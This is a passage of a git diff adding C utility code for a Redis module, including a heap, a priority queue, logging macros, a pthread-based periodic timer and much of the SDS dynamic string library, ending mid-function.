+            } while (cmp(__vector_GetPtr(v, ptr), t) < 0);
+            memcpy(__vector_GetPtr(v, last), t, v->elemSize);
+        }
+    }
+}
+
+void __sift_down(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *), size_t start) {
+    // left-child of __start is at 2 * __start + 1
+    // right-child of __start is at 2 * __start + 2
+    size_t len = last - first;
+    size_t child = start - first;
+
+    if (len < 2 || (len - 2) / 2 < child)
+        return;
+
+    child = 2 * child + 1;
+
+    if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+        // right-child exists and is greater than left-child
+        ++child;
+    }
+
+    // check if we are in heap-order
+    if (cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, start)) < 0)
+        // we are, __start is larger than it's largest child
+        return;
+
+    char top[v->elemSize];
+    memcpy(top, __vector_GetPtr(v, start), v->elemSize);
+    do {
+        // we are not in heap-order, swap the parent with it's largest child
+        memcpy(__vector_GetPtr(v, start), __vector_GetPtr(v, first + child), v->elemSize);
+        start = first + child;
+
+        if ((len - 2) / 2 < child)
+            break;
+
+        // recompute the child based off of the updated parent
+        child = 2 * child + 1;
+
+        if ((child + 1) < len && cmp(__vector_GetPtr(v, first + child), __vector_GetPtr(v, first + child + 1)) < 0) {
+            // right-child exists and is greater than left-child
+            ++child;
+        }
+
+        // check if we are in heap-order
+    } while (cmp(__vector_GetPtr(v, first + child), top) >= 0);
+    memcpy(__vector_GetPtr(v, start), top, v->elemSize);
+}
+
+
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        // start from the first parent, there is no need to consider children
+        for (int start = (last - first - 2) / 2; start >= 0; --start) {
+            __sift_down(v, first, last, cmp, first + start);
+        }
+    }
+}
+
+
+inline void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    __sift_up(v, first, last, cmp);
+}
+
+
+inline void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    if (last - first > 1) {
+        SWAP(__vector_GetPtr(v, first), __vector_GetPtr(v, --last), v->elemSize);
+        __sift_down(v, first, last, cmp, first);
+    }
+}
@@ -0,0 +1,38 @@
+#ifndef __HEAP_H__
+#define __HEAP_H__
+
+#include "vector.h"
+
+
+/* Make heap from range
+ * Rearranges the elements in the range [first,last) in such a way that they form a heap.
+ * A heap is a way to organize the elements of a range that allows for fast retrieval of the element with the highest
+ * value at any moment (with pop_heap), even repeatedly, while allowing for fast insertion of new elements (with
+ * push_heap).
+ * The element with the highest value is always pointed by first. The order of the other elements depends on the
+ * particular implementation, but it is consistent throughout all heap-related functions of this header.
+ * The elements are compared using cmp.
+ */
+void Make_Heap(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Push element into heap range
+ * Given a heap in the range [first,last-1), this function extends the range considered a heap to [first,last) by
+ * placing the value in (last-1) into its corresponding location within it.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Push(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+
+/* Pop element from heap range
+ * Rearranges the elements in the heap range [first,last) in such a way that the part considered a heap is shortened
+ * by one: The element with the highest value is moved to (last-1).
+ * While the element with the highest value is moved from first to (last-1) (which now is out of the heap), the other
+ * elements are reorganized in such a way that the range [first,last-1) preserves the properties of a heap.
+ * A range can be organized into a heap by calling make_heap. After that, its heap properties are preserved if elements
+ * are added and removed from it using push_heap and pop_heap, respectively.
+ */
+void Heap_Pop(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *));
+
+#endif //__HEAP_H__
@@ -0,0 +1,11 @@
+#ifndef __RMUTIL_LOGGING_H__
+#define __RMUTIL_LOGGING_H__
+
+/* Convenience macros for redis logging */
+
+#define RM_LOG_DEBUG(ctx, ...) RedisModule_Log(ctx, "debug", __VA_ARGS__)
+#define RM_LOG_VERBOSE(ctx, ...) RedisModule_Log(ctx, "verbose", __VA_ARGS__)
+#define RM_LOG_NOTICE(ctx, ...) RedisModule_Log(ctx, "notice", __VA_ARGS__)
+#define RM_LOG_WARNING(ctx, ...) RedisModule_Log(ctx, "warning", __VA_ARGS__)
+
+#endif
@@ -0,0 +1,88 @@
+#define REDISMODULE_EXPERIMENTAL_API
+#include "periodic.h"
+#include <pthread.h>
+#include <stdlib.h>
+#include <errno.h>
+
+typedef struct RMUtilTimer {
+  RMutilTimerFunc cb;
+  RMUtilTimerTerminationFunc onTerm;
+  void *privdata;
+  struct timespec interval;
+  pthread_t thread;
+  pthread_mutex_t lock;
+  pthread_cond_t cond;
+} RMUtilTimer;
+
+static struct timespec timespecAdd(struct timespec *a, struct timespec *b) {
+  struct timespec ret;
+  ret.tv_sec = a->tv_sec + b->tv_sec;
+
+  long long ns = a->tv_nsec + b->tv_nsec;
+  ret.tv_sec += ns / 1000000000;
+  ret.tv_nsec = ns % 1000000000;
+  return ret;
+}
+
+static void *rmutilTimer_Loop(void *ctx) {
+  RMUtilTimer *tm = ctx;
+
+  int rc = ETIMEDOUT;
+  struct timespec ts;
+
+  pthread_mutex_lock(&tm->lock);
+  while (rc != 0) {
+    clock_gettime(CLOCK_REALTIME, &ts);
+    struct timespec timeout = timespecAdd(&ts, &tm->interval);
+    if ((rc = pthread_cond_timedwait(&tm->cond, &tm->lock, &timeout)) == ETIMEDOUT) {
+
+      // Create a thread safe context if we're running inside redis
+      RedisModuleCtx *rctx = NULL;
+      if (RedisModule_GetThreadSafeContext) rctx = RedisModule_GetThreadSafeContext(NULL);
+
+      // call our callback...
+      tm->cb(rctx, tm->privdata);
+
+      // If needed - free the thread safe context.
+      // It's up to the user to decide whether automemory is active there
+      if (rctx) RedisModule_FreeThreadSafeContext(rctx);
+    }
+    if (rc == EINVAL) {
+      perror("Error waiting for condition");
+      break;
+    }
+  }
+
+  // call the termination callback if needed
+  if (tm->onTerm != NULL) {
+    tm->onTerm(tm->privdata);
+  }
+
+  // free resources associated with the timer
+  pthread_cond_destroy(&tm->cond);
+  free(tm);
+
+  return NULL;
+}
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval) {
+  t->interval = newInterval;
+}
+
+RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
+                                     void *privdata, struct timespec interval) {
+  RMUtilTimer *ret = malloc(sizeof(*ret));
+  *ret = (RMUtilTimer){
+      .privdata = privdata, .interval = interval, .cb = cb, .onTerm = onTerm,
+  };
+  pthread_cond_init(&ret->cond, NULL);
+  pthread_mutex_init(&ret->lock, NULL);
+
+  pthread_create(&ret->thread, NULL, rmutilTimer_Loop, ret);
+  return ret;
+}
+
+int RMUtilTimer_Terminate(struct RMUtilTimer *t) {
+  return pthread_cond_signal(&t->cond);
+}
@@ -0,0 +1,46 @@
+#ifndef RMUTIL_PERIODIC_H_
+#define RMUTIL_PERIODIC_H_
+#include <time.h>
+#include <redismodule.h>
+
+/** periodic.h - Utility periodic timer running a task repeatedly every given time interval */
+
+/* RMUtilTimer - opaque context for the timer */
+struct RMUtilTimer;
+
+/* RMutilTimerFunc - callback type for timer tasks. The ctx is a thread-safe redis module context
+ * that should be locked/unlocked by the callback when running stuff against redis. privdata is
+ * pre-existing private data */
+typedef void (*RMutilTimerFunc)(RedisModuleCtx *ctx, void *privdata);
+
+typedef void (*RMUtilTimerTerminationFunc)(void *privdata);
+
+/* Create and start a new periodic timer. Each timer has its own thread and can only be run and
+ * stopped once. The timer runs `cb` every `interval` with `privdata` passed to the callback. */
+struct RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
+                                            void *privdata, struct timespec interval);
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval);
+
+/* Stop the timer loop, call the termination callbck to free up any resources linked to the timer,
+ * and free the timer after stopping.
+ *
+ * This function doesn't wait for the thread to terminate, as it may cause a race condition if the
+ * timer's callback is waiting for the redis global lock.
+ * Instead you should make sure any resources are freed by the callback after the thread loop is
+ * finished.
+ *
+ * The timer is freed automatically, so the callback doesn't need to do anything about it.
+ * The callback gets the timer's associated privdata as its argument.
+ *
+ * If no callback is specified we do not free up privdata. If privdata is NULL we still call the
+ * callback, as it may log stuff or free global resources.
+ */
+int RMUtilTimer_Terminate(struct RMUtilTimer *t);
+
+/* DEPRECATED - do not use this function (well now you can't), use terminate instead
+    Free the timer context. The caller should be responsible for freeing the private data at this
+ * point */
+// void RMUtilTimer_Free(struct RMUtilTimer *t);
+#endif
@@ -0,0 +1,36 @@
+#include "priority_queue.h"
+#include "heap.h"
+
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *)) {
+    PriorityQueue *pq = malloc(sizeof(PriorityQueue));
+    pq->v = __newVectorSize(elemSize, cap);
+    pq->cmp = cmp;
+    return pq;
+}
+
+inline size_t Priority_Queue_Size(PriorityQueue *pq) {
+    return Vector_Size(pq->v);
+}
+
+inline int Priority_Queue_Top(PriorityQueue *pq, void *ptr) {
+    return Vector_Get(pq->v, 0, ptr);
+}
+
+inline size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem) {
+    size_t top = __vector_PushPtr(pq->v, elem);
+    Heap_Push(pq->v, 0, top, pq->cmp);
+    return top;
+}
+
+inline void Priority_Queue_Pop(PriorityQueue *pq) {
+    if (pq->v->top == 0) {
+        return;
+    }
+    Heap_Pop(pq->v, 0, pq->v->top, pq->cmp);
+    pq->v->top--;
+}
+
+void Priority_Queue_Free(PriorityQueue *pq) {
+    Vector_Free(pq->v);
+    free(pq);
+}
@@ -0,0 +1,55 @@
+#ifndef __PRIORITY_QUEUE_H__
+#define __PRIORITY_QUEUE_H__
+
+#include "vector.h"
+
+/* Priority queue
+ * Priority queues are designed such that its first element is always the greatest of the elements it contains.
+ * This context is similar to a heap, where elements can be inserted at any moment, and only the max heap element can be
+ * retrieved (the one at the top in the priority queue).
+ * Priority queues are implemented as Vectors. Elements are popped from the "back" of Vector, which is known as the top
+ * of the priority queue.
+ */
+typedef struct {
+    Vector *v;
+
+    int (*cmp)(void *, void *);
+} PriorityQueue;
+
+/* Construct priority queue
+ * Constructs a priority_queue container adaptor object.
+ */
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *));
+
+#define NewPriorityQueue(type, cap, cmp) __newPriorityQueueSize(sizeof(type), cap, cmp)
+
+/* Return size
+ * Returns the number of elements in the priority_queue.
+ */
+size_t Priority_Queue_Size(PriorityQueue *pq);
+
+/* Access top element
+ * Copy the top element in the priority_queue to ptr.
+ * The top element is the element that compares higher in the priority_queue.
+ */
+int Priority_Queue_Top(PriorityQueue *pq, void *ptr);
+
+/* Insert element
+ * Inserts a new element in the priority_queue.
+ */
+size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem);
+
+#define Priority_Queue_Push(pq, elem) __priority_Queue_PushPtr(pq, &(typeof(elem)){elem})
+
+/* Remove top element
+ * Removes the element on top of the priority_queue, effectively reducing its size by one. The element removed is the
+ * one with the highest value.
+ * The value of this element can be retrieved before being popped by calling Priority_Queue_Top.
+ */
+void Priority_Queue_Pop(PriorityQueue *pq);
+
+/* free the priority queue and the underlying data. Does not release its elements if
+ * they are pointers */
+void Priority_Queue_Free(PriorityQueue *pq);
+
+#endif //__PRIORITY_QUEUE_H__
@@ -0,0 +1,1274 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <assert.h>
+#include "sds.h"
+#include "sdsalloc.h"
+
+static inline int sdsHdrSize(char type) {
+    switch(type&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return sizeof(struct sdshdr5);
+        case SDS_TYPE_8:
+            return sizeof(struct sdshdr8);
+        case SDS_TYPE_16:
+            return sizeof(struct sdshdr16);
+        case SDS_TYPE_32:
+            return sizeof(struct sdshdr32);
+        case SDS_TYPE_64:
+            return sizeof(struct sdshdr64);
+    }
+    return 0;
+}
+
+static inline char sdsReqType(size_t string_size) {
+    if (string_size < 32)
+        return SDS_TYPE_5;
+    if (string_size < 0xff)
+        return SDS_TYPE_8;
+    if (string_size < 0xffff)
+        return SDS_TYPE_16;
+    if (string_size < 0xffffffff)
+        return SDS_TYPE_32;
+    return SDS_TYPE_64;
+}
+
+/* Create a new sds string with the content specified by the 'init' pointer
+ * and 'initlen'.
+ * If NULL is used for 'init' the string is initialized with zero bytes.
+ *
+ * The string is always null-termined (all the sds strings are, always) so
+ * even if you create an sds string with:
+ *
+ * mystring = sdsnewlen("abc",3);
+ *
+ * You can print the string with printf() as there is an implicit \0 at the
+ * end of the string. However the string is binary safe and can contain
+ * \0 characters in the middle, as the length is stored in the sds header. */
+sds sdsnewlen(const void *init, size_t initlen) {
+    void *sh;
+    sds s;
+    char type = sdsReqType(initlen);
+    /* Empty strings are usually created in order to append. Use type 8
+     * since type 5 is not good at this. */
+    if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
+    int hdrlen = sdsHdrSize(type);
+    unsigned char *fp; /* flags pointer. */
+
+    sh = s_malloc(hdrlen+initlen+1);
+    if (!init)
+        memset(sh, 0, hdrlen+initlen+1);
+    if (sh == NULL) return NULL;
+    s = (char*)sh+hdrlen;
+    fp = ((unsigned char*)s)-1;
+    switch(type) {
+        case SDS_TYPE_5: {
+            *fp = type | (initlen << SDS_TYPE_BITS);
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+    }
+    if (initlen && init)
+        memcpy(s, init, initlen);
+    s[initlen] = '\0';
+    return s;
+}
+
+/* Create an empty (zero length) sds string. Even in this case the string
+ * always has an implicit null term. */
+sds sdsempty(void) {
+    return sdsnewlen("",0);
+}
+
+/* Create a new sds string starting from a null terminated C string. */
+sds sdsnew(const char *init) {
+    size_t initlen = (init == NULL) ? 0 : strlen(init);
+    return sdsnewlen(init, initlen);
+}
+
+/* Duplicate an sds string. */
+sds sdsdup(const sds s) {
+    return sdsnewlen(s, sdslen(s));
+}
+
+/* Free an sds string. No operation is performed if 's' is NULL. */
+void sdsfree(sds s) {
+    if (s == NULL) return;
+    s_free((char*)s-sdsHdrSize(s[-1]));
+}
+
+/* Set the sds string length to the length as obtained with strlen(), so
+ * considering as content only up to the first null term character.
+ *
+ * This function is useful when the sds string is hacked manually in some
+ * way, like in the following example:
+ *
+ * s = sdsnew("foobar");
+ * s[2] = '\0';
+ * sdsupdatelen(s);
+ * printf("%d\n", sdslen(s));
+ *
+ * The output will be "2", but if we comment out the call to sdsupdatelen()
+ * the output will be "6" as the string was modified but the logical length
+ * remains 6 bytes. */
+void sdsupdatelen(sds s) {
+    int reallen = strlen(s);
+    sdssetlen(s, reallen);
+}
+
+/* Modify an sds string in-place to make it empty (zero length).
+ * However all the existing buffer is not discarded but set as free space
+ * so that next append operations will not require allocations up to the
+ * number of bytes previously available. */
+void sdsclear(sds s) {
+    sdssetlen(s, 0);
+    s[0] = '\0';
+}
+
+/* Enlarge the free space at the end of the sds string so that the caller
+ * is sure that after calling this function can overwrite up to addlen
+ * bytes after the end of the string, plus one more byte for nul term.
+ *
+ * Note: this does not change the *length* of the sds string as returned
+ * by sdslen(), but only the free buffer space we have. */
+sds sdsMakeRoomFor(sds s, size_t addlen) {
+    void *sh, *newsh;
+    size_t avail = sdsavail(s);
+    size_t len, newlen;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+
+    /* Return ASAP if there is enough space left. */
+    if (avail >= addlen) return s;
+
+    len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+    newlen = (len+addlen);
+    if (newlen < SDS_MAX_PREALLOC)
+        newlen *= 2;
+    else
+        newlen += SDS_MAX_PREALLOC;
+
+    type = sdsReqType(newlen);
+
+    /* Don't use type 5: the user is appending to the string and type 5 is
+     * not able to remember empty space, so sdsMakeRoomFor() must be called
+     * at every appending operation. */
+    if (type == SDS_TYPE_5) type = SDS_TYPE_8;
+
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        /* Since the header size changes, need to move the string forward,
+         * and can't use realloc */
+        newsh = s_malloc(hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, newlen);
+    return s;
+}
+
+/* Reallocate the sds string so that it has no free space at the end. The
+ * contained string remains not altered, but next concatenation operations
+ * will require a reallocation.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdsRemoveFreeSpace(sds s) {
+    void *sh, *newsh;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+    size_t len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+
+    type = sdsReqType(len);
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        newsh = s_malloc(hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, len);
+    return s;
+}
+
+/* Return the total size of the allocation of the specifed sds string,
+ * including:
+ * 1) The sds header before the pointer.
+ * 2) The string.
+ * 3) The free buffer at the end if any.
+ * 4) The implicit null term.
+ */
+size_t sdsAllocSize(sds s) {
+    size_t alloc = sdsalloc(s);
+    return sdsHdrSize(s[-1])+alloc+1;
+}
+
+/* Return the pointer of the actual SDS allocation (normally SDS strings
+ * are referenced by the start of the string buffer). */
+void *sdsAllocPtr(sds s) {
+    return (void*) (s-sdsHdrSize(s[-1]));
+}
+
+/* Increment the sds length and decrements the left free space at the
+ * end of the string according to 'incr'. Also set the null term
+ * in the new end of the string.
+ *
+ * This function is used in order to fix the string length after the
+ * user calls sdsMakeRoomFor(), writes something after the end of
+ * the current string, and finally needs to set the new length.
+ *
+ * Note: it is possible to use a negative increment in order to
+ * right-trim the string.
+ *
+ * Usage example:
+ *
+ * Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the
+ * following schema, to cat bytes coming from the kernel to the end of an
+ * sds string without copying into an intermediate buffer:
+ *
+ * oldlen = sdslen(s);
+ * s = sdsMakeRoomFor(s, BUFFER_SIZE);
+ * nread = read(fd, s+oldlen, BUFFER_SIZE);
+ * ... check for nread <= 0 and handle it ...
+ * sdsIncrLen(s, nread);
+ */
+void sdsIncrLen(sds s, int incr) {
+    unsigned char flags = s[-1];
+    size_t len;
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            unsigned char *fp = ((unsigned char*)s)-1;
+            unsigned char oldlen = SDS_TYPE_5_LEN(flags);
+            assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr)));
+            *fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS);
+            len = oldlen+incr;
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        default: len = 0; /* Just to avoid compilation warnings. */
+    }
+    s[len] = '\0';
+}
+
+/* Grow the sds to have the specified length. Bytes that were not part of
+ * the original length of the sds will be set to zero.
+ *
+ * if the specified length is smaller than the current length, no operation
+ * is performed. */
+sds sdsgrowzero(sds s, size_t len) {
+    size_t curlen = sdslen(s);
+
+    if (len <= curlen) return s;
+    s = sdsMakeRoomFor(s,len-curlen);
+    if (s == NULL) return NULL;
+
+    /* Make sure added region doesn't contain garbage */
+    memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the
+ * end of the specified sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatlen(sds s, const void *t, size_t len) {
+    size_t curlen = sdslen(s);
+
+    s = sdsMakeRoomFor(s,len);
+    if (s == NULL) return NULL;
+    memcpy(s+curlen, t, len);
+    sdssetlen(s, curlen+len);
+    s[curlen+len] = '\0';
+    return s;
+}
+
+/* Append the specified null termianted C string to the sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscat(sds s, const char *t) {
+    return sdscatlen(s, t, strlen(t));
+}
+
+/* Append the specified sds 't' to the existing sds 's'.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatsds(sds s, const sds t) {
+    return sdscatlen(s, t, sdslen(t));
+}
+
+/* Destructively modify the sds string 's' to hold the specified binary
+ * safe string pointed by 't' of length 'len' bytes. */
+sds sdscpylen(sds s, const char *t, size_t len) {
+    if (sdsalloc(s) < len) {
+        s = sdsMakeRoomFor(s,len-sdslen(s));
+        if (s == NULL) return NULL;
+    }
+    memcpy(s, t, len);
+    s[len] = '\0';
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Like sdscpylen() but 't' must be a null-termined string so that the length
+ * of the string is obtained with strlen(). */
+sds sdscpy(sds s, const char *t) {
+    return sdscpylen(s, t, strlen(t));
+}
+
+/* Helper for sdscatlonglong() doing the actual number -> string
+ * conversion. 's' must point to a string with room for at least
+ * SDS_LLSTR_SIZE bytes.
+ *
+ * The function returns the length of the null-terminated string
+ * representation stored at 's'. */
+#define SDS_LLSTR_SIZE 21
+int sdsll2str(char *s, long long value) {
+    char *p, aux;
+    unsigned long long v;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    v = (value < 0) ? -value : value;
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+    if (value < 0) *p++ = '-';
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Identical sdsll2str(), but for unsigned long long type. */
+int sdsull2str(char *s, unsigned long long v) {
+    char *p, aux;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Create an sds string from a long long value. It is much faster than:
+ *
+ * sdscatprintf(sdsempty(),"%lld\n", value);
+ */
+sds sdsfromlonglong(long long value) {
+    char buf[SDS_LLSTR_SIZE];
+    int len = sdsll2str(buf,value);
+
+    return sdsnewlen(buf,len);
+}
+
+/* Like sdscatprintf() but gets va_list instead of being variadic. */
+sds sdscatvprintf(sds s, const char *fmt, va_list ap) {
+    va_list cpy;
+    char staticbuf[1024], *buf = staticbuf, *t;
+    size_t buflen = strlen(fmt)*2;
+
+    /* We try to start using a static buffer for speed.
+     * If not possible we revert to heap allocation. */
+    if (buflen > sizeof(staticbuf)) {
+        buf = s_malloc(buflen);
+        if (buf == NULL) return NULL;
+    } else {
+        buflen = sizeof(staticbuf);
+    }
+
+    /* Try with buffers two times bigger every time we fail to
+     * fit the string in the current buffer size. */
+    while(1) {
+        buf[buflen-2] = '\0';
+        va_copy(cpy,ap);
+        vsnprintf(buf, buflen, fmt, cpy);
+        va_end(cpy);
+        if (buf[buflen-2] != '\0') {
+            if (buf != staticbuf) s_free(buf);
+            buflen *= 2;
+            buf = s_malloc(buflen);
+            if (buf == NULL) return NULL;
+            continue;
+        }
+        break;
+    }
+
+    /* Finally concat the obtained string to the SDS string and return it. */
+    t = sdscat(s, buf);
+    if (buf != staticbuf) s_free(buf);
+    return t;
+}
+
+/* Append to the sds string 's' a string obtained using printf-alike format
+ * specifier.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("Sum is: ");
+ * s = sdscatprintf(s,"%d+%d = %d",a,b,a+b).
+ *
+ * Often you need to create a string from scratch with the printf-alike
+ * format. When this is the need, just use sdsempty() as the target string:
+ *
+ * s = sdscatprintf(sdsempty(), "... your format ...", args);
+ */
+sds sdscatprintf(sds s, const char *fmt, ...) {
+    va_list ap;
+    char *t;
+    va_start(ap, fmt);
+    t = sdscatvprintf(s,fmt,ap);
+    va_end(ap);
+    return t;
+}
+
+/* This function is similar to sdscatprintf, but much faster as it does
+ * not rely on sprintf() family functions implemented by the libc that
+ * are often very slow. Moreover directly handling the sds string as
+ * new data is concatenated provides a performance improvement.
+ *
+ * However this function only handles an incompatible subset of printf-alike
+ * format specifiers:
+ *
+ * %s - C String
+ * %S - SDS string
+ * %i - signed int
+ * %I - 64 bit signed integer (long long, int64_t)
+ * %u - unsigned int
+ * %U - 64 bit unsigned integer (unsigned long long, uint64_t)
+ * %% - Verbatim "%" character.
+ */
+sds sdscatfmt(sds s, char const *fmt, ...) {
+    size_t initlen = sdslen(s);
+    const char *f = fmt;
+    int i;
+    va_list ap;
+
+    va_start(ap,fmt);
+    f = fmt;    /* Next format specifier byte to process. */
+    i = initlen; /* Position of the next byte to write to dest str. */
+    while(*f) {
+        char next, *str;
+        size_t l;
+        long long num;
+        unsigned long long unum;
+
+        /* Make sure there is always space for at least 1 char. */
+        if (sdsavail(s)==0) {
+            s = sdsMakeRoomFor(s,1);
+        }
+
+        switch(*f) {
+        case '%':
+            next = *(f+1);
+            f++;
+            switch(next) {
+            case 's':
+            case 'S':
+                str = va_arg(ap,char*);
+                l = (next == 's') ? strlen(str) : sdslen(str);
+                if (sdsavail(s) < l) {
+                    s = sdsMakeRoomFor(s,l);
+                }
